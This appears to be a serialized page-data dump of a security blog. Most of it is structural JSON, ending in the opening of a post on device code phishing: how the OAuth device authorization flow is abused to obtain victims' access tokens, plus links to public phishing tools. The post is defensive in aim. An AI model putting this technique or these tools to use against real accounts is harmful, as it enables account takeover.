to worry about authorization phishing?","Authorization Phishing: Frequently Asked Questions",{},"How authorization phishing attacks bypass MFA and passkeys",{"items":12338},[12339,13399,16410],{"__typename":952,"sys":12340,"content":12341,"title":3638,"synopsis":3639,"hashTags":60,"publishedDate":3640,"slug":3641,"tagsCollection":13389,"authorsCollection":13395},{"id":2344},{"json":12342},{"data":12343,"content":12344,"nodeType":691},{},[12345,12351,12354,12361,12385,12392,12397,12421,12508,12541,12548,12590,12614,12619,12622,12629,12635,12642,12657,12699,12704,12710,12725,12730,12736,12741,12747,12752,12758,12763,12770,12803,12827,12842,12866,12873,12897,12921,12945,12952,12958,12973,13015,13039,13046,13061,13094,13097,13104,13110,13116,13131,13136,13142,13236,13269,13276,13291,13297,13300,13307,13313,13352,13358,13361,13367,13373],{"data":12346,"content":12347,"nodeType":695},{},[12348],{"data":12349,"marks":12350,"value":2355,"nodeType":699},{},[],{"data":12352,"content":12353,"nodeType":721},{},[],{"data":12355,"content":12356,"nodeType":725},{},[12357],{"data":12358,"marks":12359,"value":2366,"nodeType":699},{},[12360],{"type":707},{"data":12362,"content":12363,"nodeType":695},{},[12364,12367,12373,12376,12382],{"data":12365,"marks":12366,"value":2373,"nodeType":699},{},[],{"data":12368,"content":12369,"nodeType":791},{"uri":2376},[12370],{"data":12371,"marks":12372,"value":2381,"nodeType":699},{},[],{"data":12374,"marks":12375,"value":2385,"nodeType":699},{},[],{"data":12377,"content":12378,"nodeType":791},{"uri":1030},[12379],{"data":12380,"marks":12381,"value":2392,"nodeType":699},{},[],{"data":12383,"marks":12384,"value":2396,"nodeType":699},{},[],{"data":12386,"content":12387,"nodeType":695},{},[12388],{"data":12389,"marks":12390,"value":2404,"nodeType":699},{},[12391],{"type":707},{"data":12393,"content":12396,"nodeType":1041},{"target":12394},{"sys":12395},{"id":2409,"type":1046,"linkType":1047},[],{"data":12398,"content":12399,"nodeType":695},{},[12400,12403,12409,12412,12418],{"data":12401,"marks":12402,"value":2417,"nodeType":699},{},[],{"data":12404,"content":12405,"nodeType":791},{"uri":2420},[12406],{"data":12407,"marks":12408,"value":2425,"nodeType":699},{},[],{"data":12410,"marks":12411,"value":2429,"nodeType":699},{},[],{"data":12413,"content":12414,"nodeType":791},{"uri":2432},[12415],{"data":12416,"marks":12417,"value":2437,"nodeType":699},{},[],{"data":12419,"marks":12420,"value":2441,"nodeType":699},{},[],{"data":12422,"content":12423,"nodeType":695},{},[12424,12427,12433,12436,12442,12445,12451,12454,12460,12463,12469,12472,12478,12481,12487,12490,12496,12499,12505],{"data":12425,"marks":12426,"value":2448,"nodeType":699},{},[],{"data":12428,"content":12429,"nodeType":791},{"uri":2451},[12430],{"data":12431,"marks":12432,"value":2456,"nodeType":699},{},[],{"data":12434,"marks":12435,"value":2460,"nodeType":699},{},[],{"data":12437,"content":12438,"nodeType":791},{"uri":2463},[12439],{"data":12440,"marks":12441,"value":2468,"nodeType":699},{},[],{"data":12443,"marks":12444,"value":2472,"nodeType":699},{},[],{"data":12446,"content":12447,"nodeType":791},{"uri":2475},[12448],{"data":12449,"marks":12450,"value":2480,"nodeType":699},{},[],{"data":12452,"marks":12453,"value":2484,"nodeType":699},{},[],{"data":12455,"content":12456,"nodeType":791},{"uri":2487},[12457],{"data":12458,"marks":12459,"value":2492,"nodeType":699},{},[],{"data":12461,"marks":12462,"value":2496,"nodeType":699},{},[],{"data":12464,"content":12465,"nodeType":791},{"uri":2499},[12466],{"data":12467,"marks":12468,"value":2504,"nodeType":699},{},[],{"data":12470,"marks":12471,"value":2508,"nodeType":699},{},[],{"data":12473,"content":12474,"nodeType":791},{"uri":2511},[12475],{"data":12476,"marks":12477,"value":2516,"nodeType":699},{},[],{"data":12479,"marks":12480,"value":2520,"nodeType":699},{},[],{"data":12482,"content":12483,"nodeType":791},{"uri":2523},[12484],{"data":12485,"marks":12486,"value":2528,"nodeType":699},{},[],{"data":12488,"marks":12489,"value":2532,"nodeType":699},{},[],{"data":12491,"content":12492,"nodeType":791},{"uri":2535},[12493],{"data":12494,"marks":12495,"value":2540,"nodeType":699},{},[],{"data":12497,"marks":12498,"value":2544,"nodeType":699},{},[],{"data":12500,"content":12501,"nodeType":791},{"uri":2547},[12502],{"data":12503,"marks":12504,"value":2552,"nodeType":699},{},[],{"data":12506,"marks":12507,"value":2556,"nodeType":699},{},[],{"data":12509,"content":12510,"nodeType":695},{},[12511,12514,12520,12523,12529,12532,12538],{"data":12512,"marks":12513,"value":2563,"nodeType":699},{},[],{"data":12515,"content":12516,"nodeType":791},{"uri":1355},[12517],{"data":12518,"marks":12519,"value":2570,"nodeType":699},{},[],{"data":12521,"marks":12522,"value":2574,"nodeType":699},{},[],{"data":12524,"content":12525,"nodeType":791},{"uri":2577},[12526],{"data":12527,"marks":12528,"value":2582,"nodeType":699},{},[],{"data":12530,"marks":12531,"value":2586,"nodeType":699},{},[],{"data":12533,"content":12534,"nodeType":791},{"uri":2589},[12535],{"data":12536,"marks":12537,"value":2594,"nodeType":699},{},[],{"data":12539,"marks":12540,"value":1407,"nodeType":699},{},[],{"data":12542,"content":12543,"nodeType":769},{},[12544],{"data":12545,"marks":12546,"value":2605,"nodeType":699},{},[12547],{"type":707},{"data":12549,"content":12550,"nodeType":695},{},[12551,12554,12560,12563,12569,12572,12578,12581,12587],{"data":12552,"marks":12553,"value":2612,"nodeType":699},{},[],{"data":12555,"content":12556,"nodeType":791},{"uri":2615},[12557],{"data":12558,"marks":12559,"value":2620,"nodeType":699},{},[],{"data":12561,"marks":12562,"value":2624,"nodeType":699},{},[],{"data":12564,"content":12565,"nodeType":791},{"uri":2627},[12566],{"data":12567,"marks":12568,"value":2632,"nodeType":699},{},[],{"data":12570,"marks":12571,"value":2636,"nodeType":699},{},[],{"data":12573,"content":12574,"nodeType":791},{"uri":2639},[12575],{"data":12576,"marks":12577,"value":2644,"nodeType":699},{},[],{"data":12579,"marks":12580,"value":2648,"nodeType":699},{},[],{"data":12582,"content":12583,"nodeType":791},{"uri":2651},[12584],{"data":12585,"marks":12586,"value":2656,"nodeType":699},{},[],{"data":12588,"marks":12589,"value":2660,"nodeType":699},{},[],{"data":12591,"content":12592,"nodeType":695},{},[12593,12596,12602,12605,12611],{"data":12594,"marks":12595,"value":2667,"nodeType":699},{},[],{"data":12597,"content":12598,"nodeType":791},{"uri":2670},[12599],{"data":12600,"marks":12601,"value":2675,"nodeType":699},{},[],{"data":12603,"marks":12604,"value":2679,"nodeType":699},{},[],{"data":12606,"content":12607,"nodeType":791},{"uri":2682},[12608],{"data":12609,"marks":12610,"value":2687,"nodeType":699},{},[],{"data":12612,"marks":12613,"value":2691,"nodeType":699},{},[],{"data":12615,"content":12618,"nodeType":1041},{"target":12616},{"sys":12617},{"id":2696,"type":1046,"linkType":1047},[],{"data":12620,"content":12621,"nodeType":721},{},[],{"data":12623,"content":12624,"nodeType":725},{},[12625],{"data":12626,"marks":12627,"value":2708,"nodeType":699},{},[12628],{"type":707},{"data":12630,"content":12631,"nodeType":695},{},[12632],{"data":12633,"marks":12634,"value":2715,"nodeType":699},{},[],{"data":12636,"content":12637,"nodeType":769},{},[12638],{"data":12639,"marks":12640,"value":2723,"nodeType":699},{},[12641],{"type":707},{"data":12643,"content":12644,"nodeType":695},{},[12645,12648,12654],{"data":12646,"marks":12647,"value":2730,"nodeType":699},{},[],{"data":12649,"content":12650,"nodeType":791},{"uri":1355},[12651],{"data":12652,"marks":12653,"value":2570,"nodeType":699},{},[],{"data":12655,"marks":12656,"value":2740,"nodeType":699},{},[],{"data":12658,"content":12659,"nodeType":695},{},[12660,12663,12669,12672,12678,12681,12687,12690,12696],{"data":12661,"marks":12662,"value":2747,"nodeType":699},{},[],{"data":12664,"content":12665,"nodeType":791},{"uri":2750},[12666],{"data":12667,"marks":12668,"value":2755,"nodeType":699},{},[],{"data":12670,"marks":12671,"value":2759,"nodeType":699},{},[],{"data":12673,"content":12674,"nodeType":791},{"uri":2762},[12675],{"data":12676,"marks":12677,"value":2767,"nodeType":699},{},[],{"data":12679,"marks":12680,"value":2771,"nodeType":699},{},[],{"data":12682,"content":12683,"nodeType":791},{"uri":2774},[12684],{"data":12685,"marks":12686,"value":2779,"nodeType":699},{},[],{"data":12688,"marks":12689,"value":2783,"nodeType":699},{},[],{"data":12691,"content":12692,"nodeType":791},{"uri":2786},[12693],{"data":12694,"marks":12695,"value":2791,"nodeType":699},{},[],{"data":12697,"marks":12698,"value":2795,"nodeType":699},{},[],{"data":12700,"content":12703,"nodeType":1041},{"target":12701},{"sys":12702},{"id":2800,"type":1046,"linkType":1047},[],{"data":12705,"content":12706,"nodeType":695},{},[12707],{"data":12708,"marks":12709,"value":2808,"nodeType":699},{},[],{"data":12711,"content":12712,"nodeType":695},{},[12713,12716,12722],{"data":12714,"marks":12715,"value":2815,"nodeType":699},{},[],{"data":12717,"content":12718,"nodeType":791},{"uri":2818},[12719],{"data":12720,"marks":12721,"value":2823,"nodeType":699},{},[],{"data":12723,"marks":12724,"value":2827,"nodeType":699},{},[],{"data":12726,"content":12729,"nodeType":1041},{"target":12727},{"sys":12728},{"id":2832,"type":1046,"linkType":1047},[],{"data":12731,"content":12732,"nodeType":695},{},[12733],{"data":12734,"marks":12735,"value":2840,"nodeType":699},{},[],{"data":12737,"content":12740,"nodeType":1041},{"target":12738},{"sys":12739},{"id":2845,"type":1046,"linkType":1047},[],{"data":12742,"content":12743,"nodeType":695},{},[12744],{"data":12745,"marks":12746,"value":2853,"nodeType":699},{},[],{"data":12748,"content":12751,"nodeType":1041},{"target":12749},{"sys":12750},{"id":2858,"type":1046,"linkType":1047},[],{"data":12753,"content":12754,"nodeType":695},{},[12755],{"data":12756,"marks":12757,"value":2866,"nodeType":699},{},[],{"data":12759,"content":12762,"nodeType":1041},{"target":12760},{"sys":12761},{"id":2871,"type":1046,"linkType":1047},[],{"data":12764,"content":12765,"nodeType":769},{},[12766],{"data":12767,"marks":12768,"value":2880,"nodeType":699},{},[12769],{"type":707},{"data":12771,"content":12772,"nodeType":695},{},[12773,12776,12782,12785,12791,12794,12800],{"data":12774,"marks":12775,"value":2887,"nodeType":699},{},[],{"data":12777,"content":12778,"nodeType":791},{"uri":2890},[12779],{"data":12780,"marks":12781,"value":2895,"nodeType":699},{},[],{"data":12783,"marks":12784,"value":2899,"nodeType":699},{},[],{"data":12786,"content":12787,"nodeType":791},{"uri":2902},[12788],{"data":12789,"marks":12790,"value":2907,"nodeType":699},{},[],{"data":12792,"marks":12793,"value":2911,"nodeType":699},{},[],{"data":12795,"content":12796,"nodeType":791},{"uri":2914},[12797],{"data":12798,"marks":12799,"value":2919,"nodeType":699},{},[],{"data":12801,"marks":12802,"value":2923,"nodeType":699},{},[],{"data":12804,"content":12805,"nodeType":695},{},[12806,12809,12815,12818,12824],{"data":12807,"marks":12808,"value":2930,"nodeType":699},{},[],{"data":12810,"content":12811,"nodeType":791},{"uri":2933},[12812],{"data":12813,"marks":12814,"value":2938,"nodeType":699},{},[],{"data":12816,"marks":12817,"value":2942,"nodeType":699},{},[],{"data":12819,"content":12820,"nodeType":791},{"uri":2945},[12821],{"data":12822,"marks":12823,"value":2950,"nodeType":699},{},[],{"data":12825,"marks":12826,"value":2954,"nodeType":699},{},[],{"data":12828,"content":12829,"nodeType":695},{},[12830,12833,12839],{"data":12831,"marks":12832,"value":2961,"nodeType":699},{},[],{"data":12834,"content":12835,"nodeType":791},{"uri":2964},[12836],{"data":12837,"marks":12838,"value":2969,"nodeType":699},{},[],{"data":12840,"marks":12841,"value":2973,"nodeType":699},{},[],{"data":12843,"content":12844,"nodeType":695},{},[12845,12848,12854,12857,12863],{"data":12846,"marks":12847,"value":2980,"nodeType":699},{},[],{"data":12849,"content":12850,"nodeType":791},{"uri":2983},[12851],{"data":12852,"marks":12853,"value":2988,"nodeType":699},{},[],{"data":12855,"marks":12856,"value":2992,"nodeType":699},{},[],{"data":12858,"content":12859,"nodeType":791},{"uri":2995},[12860],{"data":12861,"marks":12862,"value":3000,"nodeType":699},{},[],{"data":12864,"marks":12865,"value":3004,"nodeType":699},{},[],{"data":12867,"content":12868,"nodeType":769},{},[12869],{"data":12870,"marks":12871,"value":3012,"nodeType":699},{},[12872],{"type":707},{"data":12874,"content":12875,"nodeType":695},{},[12876,12879,12885,12888,12894],{"data":12877,"marks":12878,"value":3019,"nodeType":699},{},[],{"data":12880,"content":12881,"nodeType":791},{"uri":3022},[12882],{"data":12883,"marks":12884,"value":3027,"nodeType":699},{},[],{"data":12886,"marks":12887,"value":3031,"nodeType":699},{},[],{"data":12889,"content":12890,"nodeType":791},{"uri":3034},[12891],{"data":12892,"marks":12893,"value":3039,"nodeType":699},{},[],{"data":12895,"marks":12896,"value":3043,"nodeType":699},{},[],{"data":12898,"content":12899,"nodeType":695},{},[12900,12903,12909,12912,12918],{"data":12901,"marks":12902,"value":3050,"nodeType":699},{},[],{"data":12904,"content":12905,"nodeType":791},{"uri":3053},[12906],{"data":12907,"marks":12908,"value":3058,"nodeType":699},{},[],{"data":12910,"marks":12911,"value":3062,"nodeType":699},{},[],{"data":12913,"content":12914,"nodeType":791},{"uri":3065},[12915],{"data":12916,"marks":12917,"value":3070,"nodeType":699},{},[],{"data":12919,"marks":12920,"value":3074,"nodeType":699},{},[],{"data":12922,"content":12923,"nodeType":695},{},[12924,12927,12933,12936,12942],{"data":12925,"marks":12926,"value":3081,"nodeType":699},{},[],{"data":12928,"content":12929,"nodeType":791},{"uri":3084},[12930],{"data":12931,"marks":12932,"value":3089,"nodeType":699},{},[],{"data":12934,"marks":12935,"value":3093,"nodeType":699},{},[],{"data":12937,"content":12938,"nodeType":791},{"uri":3096},[12939],{"data":12940,"marks":12941,"value":3101,"nodeType":699},{},[],{"data":12943,"marks":12944,"value":3105,"nodeType":699},{},[],{"data":12946,"content":12947,"nodeType":769},{},[12948],{"data":12949,"marks":12950,"value":3113,"nodeType":699},{},[12951],{"type":707},{"data":12953,"content":12954,"nodeType":695},{},[12955],{"data":12956,"marks":12957,"value":3120,"nodeType":699},{},[],{"data":12959,"content":12960,"nodeType":695},{},[12961,12964,12970],{"data":12962,"marks":12963,"value":3127,"nodeType":699},{},[],{"data":12965,"content":12966,"nodeType":791},{"uri":3130},[12967],{"data":12968,"marks":12969,"value":3135,"nodeType":699},{},[],{"data":12971,"marks":12972,"value":3139,"nodeType":699},{},[],{"data":12974,"content":12975,"nodeType":695},{},[12976,12979,12985,12988,12994,12997,13003,13006,13012],{"data":12977,"marks":12978,"value":3146,"nodeType":699},{},[],{"data":12980,"content":12981,"nodeType":791},{"uri":3149},[12982],{"data":12983,"marks":12984,"value":3154,"nodeType":699},{},[],{"data":12986,"marks":12987,"value":3158,"nodeType":699},{},[],{"data":12989,"content":12990,"nodeType":791},{"uri":3161},[12991],{"data":12992,"marks":12993,"value":3166,"nodeType":699},{},[],{"data":12995,"marks":12996,"value":3170,"nodeType":699},{},[],{"data":12998,"content":12999,"nodeType":791},{"uri":3173},[13000],{"data":13001,"marks":13002,"value":3178,"nodeType":699},{},[],{"data":13004,"marks":13005,"value":3182,"nodeType":699},{},[],{"data":13007,"content":13008,"nodeType":791},{"uri":3185},[13009],{"data":13010,"marks":13011,"value":3190,"nodeType":699},{},[],{"data":13013,"marks":13014,"value":1407,"nodeType":699},{},[],{"data":13016,"content":13017,"nodeType":695},{},[13018,13021,13027,13030,13036],{"data":13019,"marks":13020,"value":3200,"nodeType":699},{},[],{"data":13022,"content":13023,"nodeType":791},{"uri":3203},[13024],{"data":13025,"marks":13026,"value":3208,"nodeType":699},{},[],{"data":13028,"marks":13029,"value":3212,"nodeType":699},{},[],{"data":13031,"content":13032,"nodeType":791},{"uri":3215},[13033],{"data":13034,"marks":13035,"value":3220,"nodeType":699},{},[],{"data":13037,"marks":13038,"value":3224,"nodeType":699},{},[],{"data":13040,"content":13041,"nodeType":769},{},[13042],{"data":13043,"marks":13044,"value":3232,"nodeType":699},{},[13045],{"type":707},{"data":13047,"content":13048,"nodeType":695},{},[13049,13052,13058],{"data":13050,"marks":13051,"value":3239,"nodeType":699},{},[],{"data":13053,"content":13054,"nodeType":791},{"uri":2577},[13055],{"data":13056,"marks":13057,"value":3246,"nodeType":699},{},[],{"data":13059,"marks":13060,"value":3250,"nodeType":699},{},[],{"data":13062,"content":13063,"nodeType":695},{},[13064,13067,13073,13076,13082,13085,13091],{"data":13065,"marks":13066,"value":3257,"nodeType":699},{},[],{"data":13068,"content":13069,"nodeType":791},{"uri":3260},[13070],{"data":13071,"marks":13072,"value":3265,"nodeType":699},{},[],{"data":13074,"marks":13075,"value":3269,"nodeType":699},{},[],{"data":13077,"content":13078,"nodeType":791},{"uri":3272},[13079],{"data":13080,"marks":13081,"value":3277,"nodeType":699},{},[],{"data":13083,"marks":13084,"value":3281,"nodeType":699},{},[],{"data":13086,"content":13087,"nodeType":791},{"uri":3284},[13088],{"data":13089,"marks":13090,"value":3289,"nodeType":699},{},[],{"data":13092,"marks":13093,"value":3293,"nodeType":699},{},[],{"data":13095,"content":13096,"nodeType":721},{},[],{"data":13098,"content":13099,"nodeType":725},{},[13100],{"data":13101,"marks":13102,"value":3304,"nodeType":699},{},[13103],{"type":707},{"data":13105,"content":13106,"nodeType":695},{},[13107],{"data":13108,"marks":13109,"value":3311,"nodeType":699},{},[],{"data":13111,"content":13112,"nodeType":695},{},[13113],{"data":13114,"marks":13115,"value":3318,"nodeType":699},{},[],{"data":13117,"content":13118,"nodeType":695},{},[13119,13122,13128],{"data":13120,"marks":13121,"value":3325,"nodeType":699},{},[],{"data":13123,"content":13124,"nodeType":791},{"uri":3328},[13125],{"data":13126,"marks":13127,"value":3333,"nodeType":699},{},[],{"data":13129,"marks":13130,"value":21,"nodeType":699},{},[],{"data":13132,"content":13135,"nodeType":1041},{"target":13133},{"sys":13134},{"id":3341,"type":1046,"linkType":1047},[],{"data":13137,"content":13138,"nodeType":695},{},[13139],{"data":13140,"marks":13141,"value":3349,"nodeType":699},{},[],{"data":13143,"content":13144,"nodeType":1589},{},[13145,13163,13181,13200,13218],{"data":13146,"content":13147,"nodeType":1593},{},[13148],{"data":13149,"content":13150,"nodeType":695},{},[13151,13154,13160],{"data":13152,"marks":13153,"value":3362,"nodeType":699},{},[],{"data":13155,"content":13156,"nodeType":791},{"uri":3365},[13157],{"data":13158,"marks":13159,"value":3370,"nodeType":699},{},[],{"data":13161,"marks":13162,"value":3374,"nodeType":699},{},[],{"data":13164,"content":13165,"nodeType":1593},{},[13166],{"data":13167,"content":13168,"nodeType":695},{},[13169,13172,13178],{"data":13170,"marks":13171,"value":3384,"nodeType":699},{},[],{"data":13173,"content":13174,"nodeType":791},{"uri":2774},[13175],{"data":13176,"marks":13177,"value":3391,"nodeType":699},{},[],{"data":13179,"marks":13180,"value":3395,"nodeType":699},{},[],{"data":13182,"content":13183,"nodeType":1593},{},[13184],{"data":13185,"content":13186,"nodeType":695},{},[13187,13190,13197],{"data":13188,"marks":13189,"value":21,"nodeType":699},{},[],{"data":13191,"content":13192,"nodeType":791},{"uri":3407},[13193],{"data":13194,"marks":13195,"value":3413,"nodeType":699},{},[13196],{"type":799},{"data":13198,"marks":13199,"value":3417,"nodeType":699},{},[],{"data":13201,"content":13202,"nodeType":1593},{},[13203],{"data":13204,"content":13205,"nodeType":695},{},[13206,13209,13215],{"data":13207,"marks":13208,"value":3427,"nodeType":699},{},[],{"data":13210,"content":13211,"nodeType":791},{"uri":3430},[13212],{"data":13213,"marks":13214,"value":3435,"nodeType":699},{},[],{"data":13216,"marks":13217,"value":3439,"nodeType":699},{},[],{"data":13219,"content":13220,"nodeType":1593},{},[13221],{"data":13222,"content":13223,"nodeType":695},{},[13224,13227,13233],{"data":13225,"marks":13226,"value":3449,"nodeType":699},{},[],{"data":13228,"content":13229,"nodeType":791},{"uri":3452},[13230],{"data":13231,"marks":13232,"value":3457,"nodeType":699},{},[],{"data":13234,"marks":13235,"value":3461,"nodeType":699},{},[],{"data":13237,"content":13238,"nodeType":695},{},[13239,13242,13248,13251,13257,13260,13266],{"data":13240,"marks":13241,"value":3468,"nodeType":699},{},[],{"data":13243,"content":13244,"nodeType":791},{"uri":3471},[13245],{"data":13246,"marks":13247,"value":3476,"nodeType":699},{},[],{"data":13249,"marks":13250,"value":3480,"nodeType":699},{},[],{"data":13252,"content":13253,"nodeType":791},{"uri":1259},[13254],{"data":13255,"marks":13256,"value":3487,"nodeType":699},{},[],{"data":13258,"marks":13259,"value":3491,"nodeType":699},{},[],{"data":13261,"content":13262,"nodeType":791},{"uri":3494},[13263],{"data":13264,"marks":13265,"value":3499,"nodeType":699},{},[],{"data":13267,"marks":13268,"value":3503,"nodeType":699},{},[],{"data":13270,"content":13271,"nodeType":769},{},[13272],{"data":13273,"marks":13274,"value":3511,"nodeType":699},{},[13275],{"type":707},{"data":13277,"content":13278,"nodeType":695},{},[13279,13282,13288],{"data":13280,"marks":13281,"value":3518,"nodeType":699},{},[],{"data":13283,"content":13284,"nodeType":791},{"uri":3521},[13285],{"data":13286,"marks":13287,"value":3526,"nodeType":699},{},[],{"data":13289,"marks":13290,"value":3530,"nodeType":699},{},[],{"data":13292,"content":13293,"nodeType":695},{},[13294],{"data":13295,"marks":13296,"value":3537,"nodeType":699},{},[],{"data":13298,"content":13299,"nodeType":721},{},[],{"data":13301,"content":13302,"nodeType":725},{},[13303],{"data":13304,"marks":13305,"value":3548,"nodeType":699},{},[13306],{"type":707},{"data":13308,"content":13309,"nodeType":695},{},[13310],{"data":13311,"marks":13312,"value":3555,"nodeType":699},{},[],{"data":13314,"content":13315,"nodeType":1589},{},[13316,13325,13334,13343],{"data":13317,"content":13318,"nodeType":1593},{},[13319],{"data":13320,"content":13321,"nodeType":695},{},[13322],{"data":13323,"marks":13324,"value":3568,"nodeType":699},{},[],{"data":13326,"content":13327,"nodeType":1593},{},[13328],{"data":13329,"content":13330,"nodeType":695},{},[13331],{"data":13332,"marks":13333,"value":3578,"nodeType":699},{},[],{"data":13335,"content":13336,"nodeType":1593},{},[13337],{"data":13338,"content":13339,"nodeType":695},{},[13340],{"data":13341,"marks":13342,"value":3588,"nodeType":699},{},[],{"data":13344,"content":13345,"nodeType":1593},{},[13346],{"data":13347,"content":13348,"nodeType":695},{},[13349],{"data":13350,"marks":13351,"value":3598,"nodeType":699},{},[],{"data":13353,"content":13354,"nodeType":695},{},[13355],{"data":13356,"marks":13357,"value":3605,"nodeType":699},{},[],{"data":13359,"content":13360,"nodeType":721},{},[],{"data":13362,"content":13363,"nodeType":695},{},[13364],{"data":13365,"marks":13366,"value":909,"nodeType":699},{},[],{"data":13368,"content":13369,"nodeType":695},{},[13370],{"data":13371,"marks":13372,"value":916,"nodeType":699},{},[],{"data":13374,"content":13375,"nodeType":695},{},[13376,13379,13386],{"data":13377,"marks":13378,"value":21,"nodeType":699},{},[],{"data":13380,"content":13381,"nodeType":791},{"uri":3629},[13382],{"data":13383,"marks":13384,"value":930,"nodeType":699},{},[13385],{"type":799},{"data":13387,"marks":13388,"value":21,"nodeType":699},{},[],{"items":13390},[13391,13393],{"sys":13392,"name":1833},{"id":1832},{"sys":13394,"name":1837},{"id":1836},{"items":13396},[13397],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":13398},{"url":1845},{"__typename":952,"sys":13400,"content":13402,"title":16397,"synopsis":16398,"hashTags":60,"publishedDate":16399,"slug":11500,"tagsCollection":16400,"authorsCollection":16406},{"id":13401},"5DmCqTU2Tg4adYScA5vT2x",{"json":13403},{"data":13404,"content":13405,"nodeType":691},{},[13406,13412,13432,13450,13457,13463,13470,13477,13480,13488,13494,13578,13597,13603,13610,13726,13732,13735,13743,13750,13756,13759,13767,13808,13814,13821,13828,13835,13842,13861,13867,13873,13879,13885,13891,13897,13903,13909,14172,14175,14183,14318,14324,14327,14335,14374,14508,14514,14517,14525,14672,14678,14681,14689,14695,14836,14842,14848,14851,14859,15006,15012,15015,15023,15169,15175,15178,15186,15281,15287,15290,15298,15392,15398,15401,15409,15415,15548,15554,15557,15565,15614,15620,15623,15631,15770,15775,15778,15786,15918,15924,15927,15935,15947,15954,15960,15966,15973,15994,16010,16016,16019,16027,16035,16056,16077,16082,16089,16096,16104,16111,16118,16125,16133,16140,16191,16197,16200,16208,16215,16222,16269,16275,16282,16285,16293,16300,16307,16327,16333,16340,16348,16355],{"data":13407,"content":13411,"nodeType":1041},{"target":13408},{"sys":13409},{"id":13410,"type":1046,"linkType":1047},"XOFOeNqmRHeiRbkPOJrP1",[],{"data":13413,"content":13414,"nodeType":695},{},[13415,13419,13428],{"data":13416,"marks":13417,"value":13418,"nodeType":699},{},[],"The OAuth 2.0 ",{"data":13420,"content":13422,"nodeType":791},{"uri":13421},"https:\u002F\u002Fwww.rfc-editor.org\u002Frfc\u002Frfc8628",[13423],{"data":13424,"marks":13425,"value":13427,"nodeType":699},{},[13426],{"type":799},"device authorization grant",{"data":13429,"marks":13430,"value":13431,"nodeType":699},{},[]," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. ",{"data":13433,"content":13434,"nodeType":695},{},[13435,13438,13446],{"data":13436,"marks":13437,"value":21,"nodeType":699},{},[],{"data":13439,"content":13441,"nodeType":791},{"uri":13440},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fdevice_code_phishing\u002Fdescription.md",[13442],{"data":13443,"marks":13444,"value":260,"nodeType":699},{},[13445],{"type":799},{"data":13447,"marks":13448,"value":13449,"nodeType":699},{},[]," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",{"data":13451,"content":13452,"nodeType":695},{},[13453],{"data":13454,"marks":13455,"value":13456,"nodeType":699},{},[],"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",{"data":13458,"content":13462,"nodeType":1041},{"target":13459},{"sys":13460},{"id":13461,"type":1046,"linkType":1047},"Al0pGH8vmOYiufDFiAbt0",[],{"data":13464,"content":13465,"nodeType":695},{},[13466],{"data":13467,"marks":13468,"value":13469,"nodeType":699},{},[],"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AITM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. ",{"data":13471,"content":13472,"nodeType":695},{},[13473],{"data":13474,"marks":13475,"value":13476,"nodeType":699},{},[],"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",{"data":13478,"content":13479,"nodeType":721},{},[],{"data":13481,"content":13482,"nodeType":725},{},[13483],{"data":13484,"marks":13485,"value":13487,"nodeType":699},{},[13486],{"type":707},"A brief history of device code phishing",{"data":13489,"content":13493,"nodeType":1041},{"target":13490},{"sys":13491},{"id":13492,"type":1046,"linkType":1047},"6u3DgvSGChtTJu7l9I7PG1",[],{"data":13495,"content":13496,"nodeType":695},{},[13497,13501,13510,13514,13523,13527,13536,13540,13549,13553,13562,13565,13574],{"data":13498,"marks":13499,"value":13500,"nodeType":699},{},[],"The technique was first documented in 2020, before Secureworks released the first tooling framework ",{"data":13502,"content":13504,"nodeType":791},{"uri":13503},"https:\u002F\u002Fgithub.com\u002Fsecureworks\u002FPhishInSuits",[13505],{"data":13506,"marks":13507,"value":13509,"nodeType":699},{},[13508],{"type":799},"PhishInSuits",{"data":13511,"marks":13512,"value":13513,"nodeType":699},{},[]," a year later. A host of research followed, including ",{"data":13515,"content":13517,"nodeType":791},{"uri":13516},"https:\u002F\u002Fgithub.com\u002Fsecureworks\u002Fsquarephish",[13518],{"data":13519,"marks":13520,"value":13522,"nodeType":699},{},[13521],{"type":799},"SquarePhish",{"data":13524,"marks":13525,"value":13526,"nodeType":699},{},[]," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",{"data":13528,"content":13530,"nodeType":791},{"uri":13529},"https:\u002F\u002Fdirkjanm.io\u002Fphishing-for-microsoft-entra-primary-refresh-tokens\u002F",[13531],{"data":13532,"marks":13533,"value":13535,"nodeType":699},{},[13534],{"type":799},"key research",{"data":13537,"marks":13538,"value":13539,"nodeType":699},{},[]," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",{"data":13541,"content":13543,"nodeType":791},{"uri":13542},"https:\u002F\u002Fgithub.com\u002Fdenniskniep\u002FDeviceCodePhishing",[13544],{"data":13545,"marks":13546,"value":13548,"nodeType":699},{},[13547],{"type":799},"DeviceCodePhishing tool",{"data":13550,"marks":13551,"value":13552,"nodeType":699},{},[]," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",{"data":13554,"content":13556,"nodeType":791},{"uri":13555},"https:\u002F\u002Fgithub.com\u002Fnromsdahl\u002Fsquarephish2",[13557],{"data":13558,"marks":13559,"value":13561,"nodeType":699},{},[13560],{"type":799},"SquarePhish2",{"data":13563,"marks":13564,"value":7294,"nodeType":699},{},[],{"data":13566,"content":13568,"nodeType":791},{"uri":13567},"https:\u002F\u002Fgithub.com\u002Fpraetorian-inc\u002FGitPhish",[13569],{"data":13570,"marks":13571,"value":13573,"nodeType":699},{},[13572],{"type":799},"GitPhish",{"data":13575,"marks":13576,"value":13577,"nodeType":699},{},[],", so shout out to those too). 